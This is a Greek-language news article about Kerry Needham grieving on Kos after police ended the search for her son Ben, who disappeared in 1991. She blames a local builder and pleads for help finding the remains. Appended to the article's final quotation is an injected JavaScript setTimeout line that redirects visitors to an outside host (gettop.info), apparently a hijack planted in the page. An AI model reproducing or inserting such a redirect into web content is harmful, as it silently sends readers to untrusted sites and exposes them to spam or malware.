Κατέρρευσε η μητέρα του Μπεν: Θα οργώσω όλο το νησί για να τον βρω (BINTEO)

0
13

 

Κατέρρευσε στο σημείο όπου βρέθηκε αντικείμενο του γιου της και θεωρείται ότι χάθηκε πριν από 25 χρόνια βρέθηκε η μητέρα του Μπεν Νίνταμ όπως και οι γονείς της μέσα από τα χέρια των οποίων εξαφαν΄σιτηκε το παιδί.

Έπειτα από 21 ημέρες οι έρευνες της βρετανικής αστυνομίας τους άνδρες της οποίας η Κέρι Νίνταμ είχε αποκαλέσει «ήρωες» σταμάτησαν την επιχείρηση ανεύρεσης του παιδιού το οποίο εικάζετι ότι θαφτηκε κάτω από μπάζα κατά τις οικοδομικές εργασίες. «Θα μπορούσα να οργώσω όλο το νησί για να βρω τον Μπεν. Δεν μπορώ να πω «αντίο» μέχρι να μάθω πού βρίσκεται», ανέφερε η μητέρα του που 25 χρόνια δεν έχει εγκαταλείψει την ελπίδα να βρει το παιδί της εστω και νεκρό.

Η γυναίκα θέλησε να παρευρεθεί στο σημείο όπου διεξάγονταν οι έρευνες ώστε να ευχαριστήσει τους ανθρώπους για την προσπάθειά τους. Φανερά σοκαρισμένη και συγκλονισμένη αναλύθηκε σε δάκρυα.

Δεν έκρυψε την οργή για τον άνδρα που εκτελούσε οικοδομικές εργασίες την ημέρα εξαφάνισης του γιου της καθώς στο σημείο βρέθηκε αντικείμενο που οι αστυνομικοί θεωρούν ότι ανήκε 100% στο αγόρι. «Ο Μπάρκας ήξερε. Ελπίζω να καίγεται στην κόλαση» είπε οργισμένη. Πλέον έπειτα από αστυνομική έρευνα, θεωρείται ότι το παιδί καταπλακώθηκε κάτω από μπάζα στις 24 Ιουλίου 1991 από τον Κωνσταντίνο Μπάρκα, αλλά δεν υπάρχουν απτές αποδείξεις που να αποδεικνύουν τη θεωρία, σύμφωνα με την Daily Mirror.

«Ξέρουν ότι έχει πεθάνει, αλλά δεν μπορούν να τον βρουν. Η αστυνομία είπε πως είναι ώρα να σταματήσουμε την έρευνα των τελευταίων 25 ετών. Έχουν δίκιο, αλλά δεν μπορώ να πω «αντίο» όταν ξέρω πως βρίσκεται κάπου στο νησί. Νιώθω ράκος. Δεν γίνεται να νιώσω χειρότερα απ’ ό,τι τώρα. Δεν έφυγε από την Κω, δεν τον πήρε κανείς, άρα είναι κάπου εδώ. Πιστεύουν πως είναι εδώ, αλλά δεν μπορούν να ψάξουν τα χωράφια του καθενός ή τα σπίτια που χτίστηκαν τα τελευταία χρόνια. Κάποιος ξέρει πού είναι. Για όνομα του Θεού, βοηθήστε με να τον βρω. Ξέρουμε πως είναι νεκρός, αλλά πρέπει να τον βρούμε. Δεν είναι εκεί που τον άφησα. Κάποιος ξέρει πού είναι» είπε συγκλονισμένη η Κέρι Νίνταμ και συμπλήρωσε: «Σας παρακαλώ, αφήστε με να πω «αντίο» στον γιο μου. Δεν μπορώ να τον αφήσω εκεί, στο νησί. Πρέπει να τον βρω. Να τον πάρω κάπου όπου θα βρει γαλήνη, όπου θα βρω κι εγώ γαλήνη, όπου θα μπορώ να πενθήσω». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here